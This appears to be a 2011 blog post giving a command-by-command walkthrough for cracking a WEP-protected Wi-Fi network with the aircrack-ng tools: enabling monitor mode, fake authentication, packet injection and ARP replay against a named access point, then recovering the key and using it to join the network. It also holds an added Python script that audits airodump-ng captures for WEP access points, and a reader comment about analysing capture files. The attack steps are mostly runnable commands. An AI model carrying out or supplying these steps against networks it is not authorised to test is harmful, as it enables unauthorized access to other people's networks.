September 16, 2011

Crack WEP

Hardware selection

Install BackTrack Linux

Test hardware
List interfaces

Enable monitor mode
airmon-ng start wlan0

Test injection
aireplay-ng --test mon0

Associate with the AP
Find target AP
airodump-ng mon0

Start capture
airodump-ng -c 11 --bssid 30:46:9A:A3:7C:06 -w GOBIN mon0

Fake authentication with AP
aireplay-ng --fakeauth 0 -a 30:46:9A:A3:7C:06 mon0

Interactive frame selection attack
aireplay-ng --interactive -p 0841 -c FF:FF:FF:FF:FF:FF -a 30:46:9A:A3:7C:06 mon0

WEP-encrypted ARP request packets are typically either 68 bytes (from a wireless client) or 86 bytes (from a wired client).

Standard ARP-request replay attack
Use this attack only if there is an active client.

aireplay-ng --arpreplay -b 30:46:9A:A3:7C:06 mon0

aircrack-ng GOBIN-01.cap

It usually takes 10000-34000 IVs to find the key. The WEP key appears next to "KEY FOUND". Drop the colons and enter it to log onto the network.
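The same airodump-ng capture can be used to audit your own site survey for access points still on WEP. The script below is an added example, not part of the original post: it reads the CSV that `airodump-ng -w` writes, lists every WEP access point, and compares the captured IV count with the 10000-34000 range quoted above. The sample data is constructed, and the column layout is assumed to match airodump-ng's CSV output.

```python
import csv
import io
import re

# Constructed sample in the layout of an airodump-ng "-01.csv" file
# (AP table, blank line, station table). All values are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2011-09-16 10:00:00, 2011-09-16 10:20:00, 11, 54, WEP, WEP, , -40, 1200, 21000, 0. 0. 0. 0, 7, lab-wep,
66:77:88:99:AA:BB, 2011-09-16 10:00:00, 2011-09-16 10:20:00, 6, 54, WPA2, CCMP, PSK, -55, 900, 0, 0. 0. 0. 0, 8, lab-wpa2,
CC:DD:EE:FF:00:11, 2011-09-16 10:00:00, 2011-09-16 10:20:00, 1, 54, WEP, WEP, , -70, 300, 150, 0. 0. 0. 0, 8, old-wep2,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
22:33:44:55:66:77, 2011-09-16 10:01:00, 2011-09-16 10:19:00, -50, 4000, 00:11:22:33:44:55,
"""

IV_LOW, IV_HIGH = 10000, 34000  # range quoted in the post


def parse_aps(text):
    """Return the access-point rows (first table of the file) as dicts."""
    ap_block = re.split(r"\n\s*\n", text.replace("\r\n", "\n").strip())[0]
    rows = list(csv.reader(io.StringIO(ap_block), skipinitialspace=True))
    header = [h.strip() for h in rows[0]]
    # Fields are space-padded; the columns used here precede ESSID, so an
    # ESSID containing a comma does not shift them.
    return [dict(zip(header, (f.strip() for f in r)))
            for r in rows[1:] if len(r) >= len(header)]


def audit_wep(text):
    """List WEP APs as (BSSID, ESSID, IVs, rating), most IVs first."""
    findings = []
    for ap in parse_aps(text):
        if "WEP" not in ap["Privacy"].split():
            continue
        ivs = int(ap["# IV"] or 0)
        if ivs >= IV_HIGH:
            rating = "above quoted range"
        elif ivs >= IV_LOW:
            rating = "within quoted range"
        else:
            rating = "below quoted range"
        findings.append((ap["BSSID"], ap["ESSID"], ivs, rating))
    return sorted(findings, key=lambda f: -f[2])


if __name__ == "__main__":
    for bssid, essid, ivs, rating in audit_wep(SAMPLE_CSV):
        print(f"{bssid}  {essid:<10} IVs={ivs:<6} {rating}")
```

Every access point the script lists should be moved off WEP regardless of its rating; the IV count only shows how much material a passive capture of the same length already holds.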


1 comment:

  1. Here I have shared my sample:
    Sometimes it is difficult to manage airodump-ng output files. I mean, once I generate those CSV and XML files and then start looking into them, for a large amount of data I can't figure it out. So are there any tools or services available for analysis and visualization? I have used this website and it is quite good. Here I have shared my sample data; have a look, and also share any other sources if anyone knows.